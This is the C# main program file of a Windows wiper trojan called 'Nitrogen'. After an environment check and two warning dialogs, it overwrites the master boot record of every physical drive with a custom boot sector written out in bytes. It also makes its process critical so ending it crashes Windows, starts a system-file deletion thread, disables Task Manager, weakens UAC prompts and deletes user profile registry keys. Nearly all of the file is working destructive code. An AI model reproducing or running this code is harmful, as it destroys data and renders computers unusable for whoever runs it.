using Microsoft.Win32; using System; using System.Diagnostics; using System.Threading; using System.Windows.Forms; using static Nitrogen.Dll_Imports; namespace Nitrogen { internal static class Program { ///

/// Punto di ingresso principale dell'applicazione. ///

[STAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); if (variables.AlreadyRunning()) { Environment.Exit(0); } else if (!variables.IsAnalyzed()) { MessageBox.Show("For your security, this malware can only run in isolated environments.","Nitrogen - ENVIRONMENT ERROR",MessageBoxButtons.OK,MessageBoxIcon.Error); Environment.Exit(0); } var dlg = MessageBox.Show("You have run a trojan known as Nitrogen.\nRunning the malware will result in data loss and your machine being unusable.\n\nDO YOU WANT TO RUN THE MALWARE AND DESTROY YOUR COMPUTER?","Nitrogen - MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Warning,MessageBoxDefaultButton.Button2); if (dlg == DialogResult.Yes) { var dlg2 = MessageBox.Show("THIS IS THE FINAL WARNING!!\nRUNNING THIS MALWARE WILL REALLY WIPE YOUR OPERATING SYSTEM!!!!\n\nDO YOU STILL WANT TO RUN IT AND SAY GOODBYE TO YOUR OS??","Nitrogen - LAST MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Error,MessageBoxDefaultButton.Button2); if (dlg2 == DialogResult.Yes) { Run(); } else { Environment.Exit(0); } } else { Environment.Exit(0); } } private static void Run() { // MBR Made by mattia2010.exeyt on Discord var mbrData = new byte[] { 0xE8, 0x03, 0x00, 0xE8, 0x1D, 0x00, 0xB4, 0x00, 0xB0, 0x13, 0xCD, 0x10, 0x68, 0x00, 0xA0, 0x07, 0xB4, 0x0C, 0x30, 0xC0, 0x31, 0xDB, 0x31, 0xC9, 0x31, 0xD2, 0xC3, 0x31, 0xC9, 0x31, 0xD2, 0xFF, 0x06, 0x6C, 0x7C, 0x81, 0xFA, 0x18, 0x01, 0x73, 0xF2, 0xE8, 0x10, 0x00, 0xE8, 0x2D, 0x00, 0x41, 0x81, 0xF9, 0x84, 0x03, 0x72, 0xED, 0x31, 0xC9, 0x42, 0xEB, 0xE8, 0xC3, 0x89, 0xCB, 0x31, 0xD3, 0x88, 0xD8, 0x02, 0x06, 0x6C, 0x7C, 0xC0, 0xE8, 0x02, 0xEB, 0x00, 0x3C, 0x37, 0x77, 0x05, 0x3C, 0x20, 0x72, 0x05, 0xC3, 0x2C, 0x10, 0xEB, 0xF3, 0x04, 0x20, 0xEB, 0xEF, 0x89, 0xD7, 0xC1, 0xE7, 0x06, 0x01, 0xD7, 0xC1, 0xE7, 0x02, 0x01, 0xCF, 0x26, 0x88, 0x05, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA }; try { for (int i = 0; i < 300; i++) { var mbr = CreateFile($"\\\\.\\PhysicalDrive{i}", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero, OpenExisting, 0, IntPtr.Zero); WriteFile(mbr, mbrData, MbrSize, out uint lpNumberOfBytesWritten, IntPtr.Zero); } } catch { } int isCritical = 1; int BreakOnTermination = 0x1D; Process.EnterDebugMode(); NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int)); Thread thr; thr = new Thread(payloads.del_sys); thr.Start(); RegistryKey rk; rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"); rk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord); rk.Close(); rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"); rk.SetValue("ConsentPromptBehaviorAdmin", 0, RegistryValueKind.DWord); rk.SetValue("ConsentPromptBehaviorUser", 3, RegistryValueKind.DWord); rk.Close(); rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion"); rk.DeleteSubKeyTree("ProfileList"); rk.Close(); thr = new Thread(payloads.story); thr.Start(); } public static void random_payloads() { for (; ; ) { Random sleeptime = new Random(); Thread.Sleep(sleeptime.Next(2000,5000)); Random rand = new Random(); int i = rand.Next(0,8); if (i == 0) { if (variables.sounds == true) { variables.sounds = false; } else { variables.sounds = true; } } else if (i == 1) { /*if (variables.drawcursor == true) { variables.drawcursor = false; } else { variables.drawcursor = true; }*/ if (variables.iconmove == true) { variables.iconmove = false; } else { variables.iconmove = true; } } else if (i == 2) { if (variables.extreme == true) { variables.extreme = false; } else { variables.extreme = true; } } else if (i == 3) { if (variables.gdi_payloads == true) { variables.gdi_payloads = false; } else { variables.gdi_payloads = true; } } else if (i == 4) { if (variables.keyboard == true) { variables.keyboard = false; } else { variables.keyboard = true; } } else if (i == 5) { if (variables.mouse == true) { variables.mouse = false; } else { variables.mouse = true; } } else if (i == 6) { if (variables.textchanger == true) { variables.textchanger = false; } else { variables.textchanger = true; } } else if (i == 7) { if (variables.window_shake == true) { variables.window_shake = false; } else { variables.window_shake = true; } } } } } }